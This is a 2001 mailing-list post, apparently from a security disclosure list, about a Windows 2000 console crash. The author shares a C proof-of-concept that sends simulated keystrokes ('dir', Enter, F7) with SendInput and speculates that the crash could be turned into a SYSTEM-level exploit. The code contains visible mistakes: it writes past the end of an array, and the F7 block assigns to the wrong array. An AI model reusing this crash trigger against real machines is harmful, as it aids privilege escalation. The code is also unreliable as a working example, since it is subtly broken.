RE: bug w2k

From: Vladimir Kraljevic (vladimir_kraljevicat_private)
Date: Wed Aug 01 2001 - 01:11:52 PDT

Next message: Hackemate.com.ar: "Re: KaZaA + Morpheus sharing files"

Previous message: Jeremy Sanders: "Re: Citrix ICA Client Access Advisory(?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It works with the simulated keystrokes as well... I was able to track it
down up to the point where subsystem crashes, but I have no more time to
spend on it.

I was able to get access violation system box and delay the restart;
everyone with decent kernel debugger (SoftICE and kinds) can trace the exact
point of the crash. I'm pretty sure that you are getting system account. If
I'm right, we'll soon have nice exploit, usefull to anyone that has access
to the CLI.

Enough for now, some work will follow, have some ideas

Vladimir

P.S. You can repeat last two lines (SendInput(...))

=============================================================CUT HERE

#define _WIN32_WINNT	0x0401
#include <windows.h>
#include <winuser.h>
#include <winnt.h>

void main(int argc, char *argv[])
{
	//Simulate "dir\n"

	INPUT inDirStrokes[7];
	memset(inDirStrokes, 0, sizeof(inDirStrokes));

	inDirStrokes[0].type=INPUT_KEYBOARD;
	inDirStrokes[0].ki.dwFlags=0;
	inDirStrokes[0].ki.wVk=VkKeyScan('d');
	inDirStrokes[1].type=INPUT_KEYBOARD;
	inDirStrokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
	inDirStrokes[1].ki.wVk=VkKeyScan('d');

	inDirStrokes[2].type=INPUT_KEYBOARD;
	inDirStrokes[2].ki.dwFlags=0;
	inDirStrokes[2].ki.wVk=VkKeyScan('i');
	inDirStrokes[3].type=INPUT_KEYBOARD;
	inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
	inDirStrokes[3].ki.wVk=VkKeyScan('i');

	inDirStrokes[4].type=INPUT_KEYBOARD;
	inDirStrokes[4].ki.dwFlags=0;
	inDirStrokes[4].ki.wVk=VkKeyScan('r');
	inDirStrokes[5].type=INPUT_KEYBOARD;
	inDirStrokes[5].ki.dwFlags=KEYEVENTF_KEYUP;
	inDirStrokes[5].ki.wVk=VkKeyScan('r');

	inDirStrokes[6].type=INPUT_KEYBOARD;
	inDirStrokes[6].ki.dwFlags=0;
	inDirStrokes[6].ki.wVk=VK_RETURN;
	inDirStrokes[7].type=INPUT_KEYBOARD;
	inDirStrokes[7].ki.dwFlags=KEYEVENTF_KEYUP;
	inDirStrokes[7].ki.wVk=VK_RETURN;

	//Simulate "<F7>\n"

	INPUT inF7Strokes[4];
	memset(inF7Strokes, 0, sizeof(inF7Strokes));

	inF7Strokes[0].type=INPUT_KEYBOARD;
	inF7Strokes[0].ki.dwFlags=0;
	inF7Strokes[0].ki.wVk=VK_F7;
	inF7Strokes[1].type=INPUT_KEYBOARD;
	inF7Strokes[1].ki.dwFlags=KEYEVENTF_KEYUP;
	inF7Strokes[1].ki.wVk=VK_F7;

	inDirStrokes[2].type=INPUT_KEYBOARD;
	inDirStrokes[2].ki.dwFlags=0;
	inDirStrokes[2].ki.wVk=VK_RETURN;
	inDirStrokes[3].type=INPUT_KEYBOARD;
	inDirStrokes[3].ki.dwFlags=KEYEVENTF_KEYUP;
	inDirStrokes[3].ki.wVk=VK_RETURN;

	SendInput(sizeof(inDirStrokes)/sizeof(inDirStrokes[0]), inDirStrokes,
sizeof(INPUT));
	SendInput(sizeof(inF7Strokes)/sizeof(inF7Strokes[0]), inF7Strokes,
sizeof(INPUT));
}

=============================================================CUT HERE

Next message: Hackemate.com.ar: "Re: KaZaA + Morpheus sharing files"
Previous message: Jeremy Sanders: "Re: Citrix ICA Client Access Advisory(?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 01 2001 - 07:52:18 PDT